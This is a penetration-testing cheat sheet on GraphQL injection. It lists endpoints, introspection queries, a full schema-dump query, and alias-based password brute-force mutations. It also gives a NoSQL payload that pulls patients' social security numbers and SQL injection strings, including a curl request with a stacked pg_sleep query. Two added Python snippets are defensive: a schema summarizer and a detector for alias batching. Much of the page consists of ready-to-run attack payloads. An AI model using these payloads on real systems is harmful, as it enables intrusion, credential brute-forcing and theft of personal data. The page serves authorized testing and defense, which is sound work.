PEN TESTING BOOK

Graphql Injection

Common GraphQL endpoints

/v1/explorer
/v1/graphiql
/graph
/graphql
/graphql/console/
/graphql.php
/graphiql
/graphiql.php

Universal Queries

query{__typename}

Introspection

query={__schema{types{name,fields{name}}}}
query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}

Identify an injection point

example.com/graphql?query={__schema{types{name}}}
example.com/graphiql?query={__schema{types{name}}}

Errors

?query={__schema}
?query={}
?query={thisdefinitelydoesnotexist}

Enumerate Database Schema via Introspection

Encoded

fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}

Decoded

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}
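
The reply to the IntrospectionQuery above arrives as deeply nested JSON in the shape of the FullType, InputValue and TypeRef fragments. The following added Python example (not from the original page) walks that reply and renders every user-defined type as SDL-style field signatures, which is also how an auditor sees exactly what a production endpoint with introspection left enabled reveals; the response data below is constructed and the type and field names are invented.

```python
import json

# Constructed sample reply to the IntrospectionQuery above; the shape follows
# the query's fragments, while the type and field names are invented.
SAMPLE_RESPONSE = json.loads('''{"data": {"__schema": {
  "types": [
    {"kind": "OBJECT", "name": "Query", "fields": [
      {"name": "flags", "args": [], "isDeprecated": false, "type": {"kind": "LIST",
       "name": null, "ofType": {"kind": "OBJECT", "name": "Flag", "ofType": null}}}]},
    {"kind": "OBJECT", "name": "Mutation", "fields": [
      {"name": "signIn", "isDeprecated": false, "args": [
         {"name": "login", "type": {"kind": "NON_NULL", "name": null,
          "ofType": {"kind": "SCALAR", "name": "String", "ofType": null}}},
         {"name": "password", "type": {"kind": "NON_NULL", "name": null,
          "ofType": {"kind": "SCALAR", "name": "String", "ofType": null}}}],
       "type": {"kind": "OBJECT", "name": "AuthPayload", "ofType": null}}]},
    {"kind": "OBJECT", "name": "Flag", "fields": [
      {"name": "name", "args": [], "isDeprecated": true,
       "type": {"kind": "SCALAR", "name": "String", "ofType": null}}]},
    {"kind": "SCALAR", "name": "String", "fields": null}]}}}''')

def render_type_ref(ref):
    """Collapse the nested ofType chain of the TypeRef fragment into SDL notation."""
    if ref["kind"] == "NON_NULL":
        return render_type_ref(ref["ofType"]) + "!"
    if ref["kind"] == "LIST":
        return "[" + render_type_ref(ref["ofType"]) + "]"
    return ref["name"]

def summarize_schema(response):
    """Map every user-defined OBJECT type to SDL-style field signatures."""
    summary = {}
    for t in response["data"]["__schema"]["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__") or not t.get("fields"):
            continue
        sigs = []
        for f in t["fields"]:
            args = ", ".join(f"{a['name']}: {render_type_ref(a['type'])}" for a in f.get("args") or [])
            sig = f"{f['name']}({args})" if args else f["name"]
            sig += ": " + render_type_ref(f["type"])
            if f.get("isDeprecated"):
                sig += "  @deprecated"   # deprecated fields still resolve
            sigs.append(sig)
        summary[t["name"]] = sigs
    return summary

if __name__ == "__main__":
    for type_name, sigs in summarize_schema(SAMPLE_RESPONSE).items():
        print(type_name, *("  " + s for s in sigs), sep="\n")
```

The `includeDeprecated: true` argument in the query is why deprecated fields show up here: they are hidden from GraphiQL autocomplete but still served.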

Querying

query={flags{name, value}}

query={hiddenFlags}

Mutations

mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}}
mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}

Aliases

mutation {
  login(pass: 1111, username: "bob")
  second: login(pass: 2222, username: "bob")
  third: login(pass: 3333, username: "bob")
  fourth: login(pass: 4444, username: "bob")
}

Query name based batching

{
    "query": "query { qname: Query { field1 } qname1: Query { field1 } }"
}
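
Both the alias payload in the Aliases section and the query-name batch above pack several root selections into one HTTP request, so a rate limiter that counts requests (or a WAF that matches the operation name) never sees the repeats. The following added Python example, not from the original page, counts root-level fields per request body with aliases folded back onto the field they alias; the request bodies are constructed in the page's `{"query": "..."}` shape and the small regex tokenizer is an assumption of this example, not a full GraphQL parser.

```python
import json
import re
from collections import Counter

# Constructed request bodies in the page's {"query": "..."} shape: the alias
# brute force from the Aliases section, the query-name batch, and a benign login.
ALIAS_BRUTE_FORCE = json.dumps({"query": """mutation {
  login(pass: 1111, username: "bob")
  second: login(pass: 2222, username: "bob")
  third: login(pass: 3333, username: "bob")
  fourth: login(pass: 4444, username: "bob")
}"""})
QUERY_NAME_BATCH = json.dumps(
    {"query": "query { qname: Query { field1 } qname1: Query { field1 } }"})
BENIGN = json.dumps({"query": 'mutation { login(pass: 1111, username: "login( login(") }'})

STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')  # string literals (block strings not handled)
TOKEN_RE = re.compile(r'@\w+|[{}():]|\w+')    # directives, punctuation, names

def root_field_counts(operation: str) -> Counter:
    """Count root selections by the field they resolve to: aliases are folded
    onto their field, string literals are blanked first so quoted text cannot
    fake a field name, and argument lists and nested selections are skipped.
    Fragment spreads are not handled (none appear on this page)."""
    text = STRING_RE.sub('""', operation)
    root_words, depth, parens = [], 0, 0
    for tok in (m.group() for m in TOKEN_RE.finditer(text)):
        if tok == "{":
            depth += 1
        elif tok == "}":
            depth -= 1
        elif tok == "(":
            parens += 1
        elif tok == ")":
            parens -= 1
        elif depth == 1 and parens == 0:
            if tok == ":":
                if root_words:
                    root_words.pop()      # the word before ':' was an alias
            elif not tok.startswith("@"):
                root_words.append(tok)
    return Counter(root_words)

def batched_fields(body: str, threshold: int = 2) -> dict:
    """Root fields selected at least `threshold` times in one request body.
    A limiter that counts HTTP requests never sees these repeats."""
    counts = root_field_counts(json.loads(body)["query"])
    return {field: n for field, n in counts.items() if n >= threshold}
```

Applying the limit to the per-field counts (or to a query cost computed the same way) rather than to the request count is what closes the gap the two payloads exploit.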

Injections

NOSQL injection

{
  doctors(
    options: "{\"limit\": 1, \"patients.ssn\" :1}", 
    search: "{ \"patients.ssn\": { \"$regex\": \".*\"}, \"lastName\":\"Admin\" }")
    {
      firstName lastName id patients{ssn}
    }
}

SQL injection

{ 
    bacon(id: "1'") { 
        id, 
        type, 
        price
    }
}
curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27

References

PayloadsAllTheThings
HackTricks Book